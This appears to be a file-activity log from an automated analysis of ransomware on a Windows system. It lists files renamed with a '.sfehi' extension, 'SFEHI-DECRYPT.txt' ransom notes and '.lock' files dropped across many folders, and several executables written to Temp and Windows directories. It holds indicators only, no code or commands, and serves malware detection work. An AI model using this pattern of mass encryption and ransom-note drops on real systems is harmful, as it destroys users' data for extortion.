C:\Python27\include\symtable.h
C:\Python27\include\symtable.h.sfehi
C:\Python27\include\sysmodule.h
C:\Python27\include\sysmodule.h.sfehi
C:\Python27\include\timefuncs.h
C:\Python27\include\timefuncs.h.sfehi
C:\Python27\include\token.h
C:\Python27\include\token.h.sfehi
C:\Python27\include\traceback.h
C:\Python27\include\traceback.h.sfehi
C:\Python27\include\tupleobject.h
C:\Python27\include\tupleobject.h.sfehi
C:\Python27\include\ucnhash.h
C:\Python27\include\ucnhash.h.sfehi
C:\Python27\include\unicodeobject.h
C:\Python27\include\unicodeobject.h.sfehi
C:\Python27\include\warnings.h
C:\Python27\include\warnings.h.sfehi
C:\Python27\include\weakrefobject.h
C:\Python27\include\weakrefobject.h.sfehi
C:\Python27\Lib\SFEHI-DECRYPT.txt
C:\Python27\Lib\a4889873a4889f9232.lock
C:\Python27\Lib\*
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.py.sfehi
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyc.sfehi
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\abc.pyo.sfehi
C:\Python27\Lib\aifc.py
C:\Python27\Lib\aifc.py.sfehi
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\antigravity.py.sfehi
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\anydbm.py.sfehi
C:\Python27\Lib\argparse.py
C:\Python27\Lib\argparse.py.sfehi
C:\Python27\Lib\ast.py
C:\Python27\Lib\ast.py.sfehi
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asynchat.py.sfehi
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\asyncore.py.sfehi
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.py.sfehi
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\atexit.pyc.sfehi
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\audiodev.py.sfehi
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.py.sfehi
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\base64.pyc.sfehi
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.py.sfehi
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\BaseHTTPServer.pyc.sfehi
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\Bastion.py.sfehi
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.py.sfehi
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\bdb.pyc.sfehi
C:\Python27\Lib\binhex.py
C:\Python27\Lib\binhex.py.sfehi
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bisect.py.sfehi
C:\Python27\Lib\bsddb\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\*
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\db.py.sfehi
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbobj.py.sfehi
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbrecio.py.sfehi
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbshelve.py.sfehi
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbtables.py.sfehi
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\dbutils.py.sfehi
C:\Python27\Lib\bsddb\test\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\test\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\test\*
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_all.py.sfehi
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_associate.py.sfehi
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_basics.py.sfehi
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compare.py.sfehi
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_compat.py.sfehi
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py.sfehi
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_db.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbenv.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbobj.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_dbtables.py.sfehi
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py.sfehi
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_early_close.py.sfehi
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_fileid.py.sfehi
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_get_none.py.sfehi
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_join.py.sfehi
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_lock.py.sfehi
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_misc.py.sfehi
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_pickle.py.sfehi
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_queue.py.sfehi
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_recno.py.sfehi
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_replication.py.sfehi
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_sequence.py.sfehi
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\test\test_thread.py.sfehi
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\bsddb\__init__.py.sfehi
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.py.sfehi
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\calendar.pyc.sfehi
C:\Python27\Lib\cgi.py
C:\Python27\Lib\cgi.py.sfehi
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\CGIHTTPServer.py.sfehi
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\cgitb.py.sfehi
C:\Python27\Lib\chunk.py
C:\Python27\Lib\chunk.py.sfehi
C:\Python27\Lib\cmd.py
C:\Python27\Lib\cmd.py.sfehi
C:\Python27\Lib\code.py
C:\Python27\Lib\code.py.sfehi
C:\Python27\Lib\code.pyc
C:\Python27\Lib\code.pyc.sfehi
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.py.sfehi
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyc.sfehi
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codecs.pyo.sfehi
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.py.sfehi
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\codeop.pyc.sfehi
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.py.sfehi
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\collections.pyc.sfehi
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\colorsys.py.sfehi
C:\Python27\Lib\commands.py
C:\Python27\Lib\commands.py.sfehi
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compileall.py.sfehi
C:\Python27\Lib\compiler\SFEHI-DECRYPT.txt
C:\Python27\Lib\compiler\a4889873a4889f9232.lock
C:\Python27\Lib\compiler\*
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\ast.py.sfehi
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\consts.py.sfehi
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\future.py.sfehi
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\misc.py.sfehi
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pyassem.py.sfehi
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\pycodegen.py.sfehi
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\symbols.py.sfehi
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\syntax.py.sfehi
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\transformer.py.sfehi
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\visitor.py.sfehi
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\compiler\__init__.py.sfehi
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.py.sfehi
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\ConfigParser.pyc.sfehi
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\contextlib.py.sfehi
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\Cookie.py.sfehi
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\cookielib.py.sfehi
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.py.sfehi
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy.pyc.sfehi
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.py.sfehi
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyc.sfehi
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\copy_reg.pyo.sfehi
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\cProfile.py.sfehi
C:\Python27\Lib\csv.py
C:\Python27\Lib\csv.py.sfehi
C:\Python27\Lib\ctypes\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\*
C:\Python27\Lib\ctypes\macholib\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\macholib\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\macholib\*
C:\Python27\Lib\ctypes\macholib\dyld.py
C:\Python27\Lib\ctypes\macholib\dyld.py.sfehi
C:\Python27\Lib\ctypes\macholib\dylib.py
C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe
\Device\KsecDD
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\2841536727.exe
\??\PIPE\wkssvc
\Device\LanmanDatagramReceiver
C:\agent.pyw
C:\Drivers\nusb3hub.cat
C:\Drivers\nusb3hub.inf
C:\Drivers\nusb3xhc.cat
C:\Drivers\nusb3xhc.inf
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\pyexpat.pyd
C:\Python27\DLLs\select.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_ctypes.pyd
C:\Python27\DLLs\_ctypes_test.pyd
\??\PIPE\DAV RPC SERVICE
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_hashlib.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_socket.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_ssl.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\DLLs\_tkinter.pyd
C:\Python27\Doc\python276.chm
C:\Python27\include\abstract.h
C:\Python27\include\asdl.h
C:\Python27\include\ast.h
C:\Python27\include\bitset.h
C:\Python27\include\boolobject.h
C:\Python27\include\bufferobject.h
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytesobject.h
C:\Python27\include\bytes_methods.h
C:\Python27\include\cellobject.h
C:\Python27\include\ceval.h
C:\Python27\include\classobject.h
C:\Python27\include\cobject.h
C:\Python27\include\code.h
C:\Python27\include\codecs.h
C:\Python27\include\compile.h
C:\Python27\include\complexobject.h
C:\Python27\include\cStringIO.h
C:\Python27\include\datetime.h
C:\Python27\include\descrobject.h
C:\Python27\include\dictobject.h
C:\Python27\include\dtoa.h
C:\Python27\include\enumobject.h
C:\Python27\include\errcode.h
C:\Python27\include\eval.h
C:\Python27\include\fileobject.h
C:\Python27\include\floatobject.h
C:\Python27\include\frameobject.h
C:\Python27\include\funcobject.h
C:\Python27\include\genobject.h
C:\Python27\include\graminit.h
C:\Python27\include\grammar.h
C:\Python27\include\import.h
C:\Python27\include\intobject.h
C:\Python27\include\intrcheck.h
C:\Python27\include\iterobject.h
C:\Python27\include\listobject.h
C:\Python27\include\longintrepr.h
C:\Python27\include\longobject.h
C:\Python27\include\marshal.h
C:\Python27\include\memoryobject.h
C:\Python27\include\metagrammar.h
C:\Python27\include\methodobject.h
C:\Python27\include\modsupport.h
C:\Python27\include\moduleobject.h
C:\Python27\include\node.h
C:\Python27\include\object.h
C:\Python27\include\objimpl.h
C:\Python27\include\opcode.h
C:\Python27\include\osdefs.h
C:\Python27\include\parsetok.h
C:\Python27\include\patchlevel.h
C:\Python27\include\pgen.h
C:\Python27\include\pgenheaders.h
C:\Python27\include\pyarena.h
C:\Python27\include\pycapsule.h
C:\Python27\include\pyconfig.h
C:\Python27\include\pyctype.h
C:\Python27\include\pydebug.h
C:\Python27\include\pyerrors.h
C:\Python27\include\pyexpat.h
C:\Python27\include\pyfpe.h
C:\Python27\include\pygetopt.h
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymath.h
C:\Python27\include\pymem.h
C:\Python27\include\pyport.h
C:\Python27\include\pystate.h
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrtod.h
C:\Python27\include\Python-ast.h
C:\Python27\include\Python.h
C:\Python27\include\pythonrun.h
C:\Python27\include\pythread.h
C:\Python27\include\py_curses.h
C:\Python27\include\rangeobject.h
C:\Python27\include\setobject.h
C:\Python27\include\sliceobject.h
C:\Python27\include\stringobject.h
C:\Python27\include\structmember.h
C:\Python27\include\structseq.h
C:\Python27\include\symtable.h
C:\Python27\include\sysmodule.h
C:\Python27\include\timefuncs.h
C:\Python27\include\token.h
C:\Python27\include\traceback.h
C:\Python27\include\tupleobject.h
C:\Python27\include\ucnhash.h
C:\Python27\include\unicodeobject.h
C:\Python27\include\warnings.h
C:\Python27\include\weakrefobject.h
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\aifc.py
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\argparse.py
C:\Python27\Lib\ast.py
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\binhex.py
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\cgi.py
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\chunk.py
C:\Python27\Lib\cmd.py
C:\Python27\Lib\code.py
C:\Python27\Lib\code.pyc
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\commands.py
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\csv.py
C:\Python27\Lib\ctypes\macholib\dyld.py
C:\Python27\Lib\ctypes\macholib\dylib.py
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
C:\Users\user\AppData\Local\Temp\2414711781.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
C:\SFEHI-DECRYPT.txt
\??\PIPE\wkssvc
C:\a4889873a4889f9232.lock
C:\$Recycle.Bin\SFEHI-DECRYPT.txt
\Device\LanmanDatagramReceiver
C:\$Recycle.Bin\a4889873a4889f9232.lock
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\a4889873a4889f9232.lock
C:\agent.pyw
C:\agent.pyw.sfehi
C:\Documents and Settings\SFEHI-DECRYPT.txt
C:\Documents and Settings\a4889873a4889f9232.lock
C:\Drivers\SFEHI-DECRYPT.txt
C:\Drivers\a4889873a4889f9232.lock
C:\Drivers\nusb3hub.cat
C:\Drivers\nusb3hub.inf
C:\Drivers\nusb3xhc.cat
C:\Drivers\nusb3xhc.inf
C:\Hotfix\SFEHI-DECRYPT.txt
C:\Hotfix\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x64\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x64\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x86\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x86\a4889873a4889f9232.lock
C:\Hotfix\Update\SFEHI-DECRYPT.txt
C:\Hotfix\Update\a4889873a4889f9232.lock
C:\Hotfix\Update\x64\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x64\a4889873a4889f9232.lock
C:\Hotfix\Update\x86\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x86\a4889873a4889f9232.lock
C:\MSOCache\SFEHI-DECRYPT.txt
C:\MSOCache\a4889873a4889f9232.lock
C:\PerfLogs\SFEHI-DECRYPT.txt
C:\PerfLogs\a4889873a4889f9232.lock
C:\PerfLogs\Admin\SFEHI-DECRYPT.txt
C:\PerfLogs\Admin\a4889873a4889f9232.lock
C:\Program Files\SFEHI-DECRYPT.txt
C:\Program Files\a4889873a4889f9232.lock
C:\Program Files (x86)\SFEHI-DECRYPT.txt
C:\Program Files (x86)\a4889873a4889f9232.lock
C:\Python27\SFEHI-DECRYPT.txt
C:\Python27\a4889873a4889f9232.lock
C:\Python27\DLLs\SFEHI-DECRYPT.txt
C:\Python27\DLLs\a4889873a4889f9232.lock
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\bz2.pyd.sfehi
C:\Python27\DLLs\pyexpat.pyd
C:\Python27\DLLs\select.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\unicodedata.pyd.sfehi
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\winsound.pyd.sfehi
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_bsddb.pyd.sfehi
C:\Python27\DLLs\_ctypes.pyd
C:\Python27\DLLs\_ctypes_test.pyd
\??\PIPE\DAV RPC SERVICE
C:\Python27\DLLs\_ctypes_test.pyd.sfehi
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_elementtree.pyd.sfehi
C:\Python27\DLLs\_hashlib.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_msi.pyd.sfehi
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_multiprocessing.pyd.sfehi
C:\Python27\DLLs\_socket.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_sqlite3.pyd.sfehi
C:\Python27\DLLs\_ssl.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\DLLs\_testcapi.pyd.sfehi
C:\Python27\DLLs\_tkinter.pyd
C:\Python27\Doc\SFEHI-DECRYPT.txt
C:\Python27\Doc\a4889873a4889f9232.lock
C:\Python27\Doc\python276.chm
C:\Python27\Doc\python276.chm.sfehi
C:\Python27\include\SFEHI-DECRYPT.txt
C:\Python27\include\a4889873a4889f9232.lock
C:\Python27\include\abstract.h
C:\Python27\include\abstract.h.sfehi
C:\Python27\include\asdl.h
C:\Python27\include\asdl.h.sfehi
C:\Python27\include\ast.h
C:\Python27\include\ast.h.sfehi
C:\Python27\include\bitset.h
C:\Python27\include\bitset.h.sfehi
C:\Python27\include\boolobject.h
C:\Python27\include\boolobject.h.sfehi
C:\Python27\include\bufferobject.h
C:\Python27\include\bufferobject.h.sfehi
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytearrayobject.h.sfehi
C:\Python27\include\bytesobject.h
C:\Python27\include\bytesobject.h.sfehi
C:\Python27\include\bytes_methods.h
C:\Python27\include\bytes_methods.h.sfehi
C:\Python27\include\cellobject.h
C:\Python27\include\cellobject.h.sfehi
C:\Python27\include\ceval.h
C:\Python27\include\ceval.h.sfehi
C:\Python27\include\classobject.h
C:\Python27\include\classobject.h.sfehi
C:\Python27\include\cobject.h
C:\Python27\include\cobject.h.sfehi
C:\Python27\include\code.h
C:\Python27\include\code.h.sfehi
C:\Python27\include\codecs.h
C:\Python27\include\codecs.h.sfehi
C:\Python27\include\compile.h
C:\Python27\include\compile.h.sfehi
C:\Python27\include\complexobject.h
C:\Python27\include\complexobject.h.sfehi
C:\Python27\include\cStringIO.h
C:\Python27\include\cStringIO.h.sfehi
C:\Python27\include\datetime.h
C:\Python27\include\datetime.h.sfehi
C:\Python27\include\descrobject.h
C:\Python27\include\descrobject.h.sfehi
C:\Python27\include\dictobject.h
C:\Python27\include\dictobject.h.sfehi
C:\Python27\include\dtoa.h
C:\Python27\include\dtoa.h.sfehi
C:\Python27\include\enumobject.h
C:\Python27\include\enumobject.h.sfehi
C:\Python27\include\errcode.h
C:\Python27\include\errcode.h.sfehi
C:\Python27\include\eval.h
C:\Python27\include\eval.h.sfehi
C:\Python27\include\fileobject.h
C:\Python27\include\fileobject.h.sfehi
C:\Python27\include\floatobject.h
C:\Python27\include\floatobject.h.sfehi
C:\Python27\include\frameobject.h
C:\Python27\include\frameobject.h.sfehi
C:\Python27\include\funcobject.h
C:\Python27\include\funcobject.h.sfehi
C:\Python27\include\genobject.h
C:\Python27\include\genobject.h.sfehi
C:\Python27\include\graminit.h
C:\Python27\include\graminit.h.sfehi
C:\Python27\include\grammar.h
C:\Python27\include\grammar.h.sfehi
C:\Python27\include\import.h
C:\Python27\include\import.h.sfehi
C:\Python27\include\intobject.h
C:\Python27\include\intobject.h.sfehi
C:\Python27\include\intrcheck.h
C:\Python27\include\intrcheck.h.sfehi
C:\Python27\include\iterobject.h
C:\Python27\include\iterobject.h.sfehi
C:\Python27\include\listobject.h
C:\Python27\include\listobject.h.sfehi
C:\Python27\include\longintrepr.h
C:\Python27\include\longintrepr.h.sfehi
C:\Python27\include\longobject.h
C:\Python27\include\longobject.h.sfehi
C:\Python27\include\marshal.h
C:\Python27\include\marshal.h.sfehi
C:\Python27\include\memoryobject.h
C:\Python27\include\memoryobject.h.sfehi
C:\Python27\include\metagrammar.h
C:\Python27\include\metagrammar.h.sfehi
C:\Python27\include\methodobject.h
C:\Python27\include\methodobject.h.sfehi
C:\Python27\include\modsupport.h
C:\Python27\include\modsupport.h.sfehi
C:\Python27\include\moduleobject.h
C:\Python27\include\moduleobject.h.sfehi
C:\Python27\include\node.h
C:\Python27\include\node.h.sfehi
C:\Python27\include\object.h
C:\Python27\include\object.h.sfehi
C:\Python27\include\objimpl.h
C:\Python27\include\objimpl.h.sfehi
C:\Python27\include\opcode.h
C:\Python27\include\opcode.h.sfehi
C:\Python27\include\osdefs.h
C:\Python27\include\osdefs.h.sfehi
C:\Python27\include\parsetok.h
C:\Python27\include\parsetok.h.sfehi
C:\Python27\include\patchlevel.h
C:\Python27\include\patchlevel.h.sfehi
C:\Python27\include\pgen.h
C:\Python27\include\pgen.h.sfehi
C:\Python27\include\pgenheaders.h
C:\Python27\include\pgenheaders.h.sfehi
C:\Python27\include\pyarena.h
C:\Python27\include\pyarena.h.sfehi
C:\Python27\include\pycapsule.h
C:\Python27\include\pycapsule.h.sfehi
C:\Python27\include\pyconfig.h
C:\Python27\include\pyconfig.h.sfehi
C:\Python27\include\pyctype.h
C:\Python27\include\pyctype.h.sfehi
C:\Python27\include\pydebug.h
C:\Python27\include\pydebug.h.sfehi
C:\Python27\include\pyerrors.h
C:\Python27\include\pyerrors.h.sfehi
C:\Python27\include\pyexpat.h
C:\Python27\include\pyexpat.h.sfehi
C:\Python27\include\pyfpe.h
C:\Python27\include\pyfpe.h.sfehi
C:\Python27\include\pygetopt.h
C:\Python27\include\pygetopt.h.sfehi
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymacconfig.h.sfehi
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymactoolbox.h.sfehi
C:\Python27\include\pymath.h
C:\Python27\include\pymath.h.sfehi
C:\Python27\include\pymem.h
C:\Python27\include\pymem.h.sfehi
C:\Python27\include\pyport.h
C:\Python27\include\pyport.h.sfehi
C:\Python27\include\pystate.h
C:\Python27\include\pystate.h.sfehi
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrcmp.h.sfehi
C:\Python27\include\pystrtod.h
C:\Python27\include\pystrtod.h.sfehi
C:\Python27\include\Python-ast.h
C:\Python27\include\Python-ast.h.sfehi
C:\Python27\include\Python.h
C:\Python27\include\Python.h.sfehi
C:\Python27\include\pythonrun.h
C:\Python27\include\pythonrun.h.sfehi
C:\Python27\include\pythread.h
C:\Python27\include\pythread.h.sfehi
C:\Python27\include\py_curses.h
C:\Python27\include\py_curses.h.sfehi
C:\Python27\include\rangeobject.h
C:\Python27\include\rangeobject.h.sfehi
C:\Python27\include\setobject.h
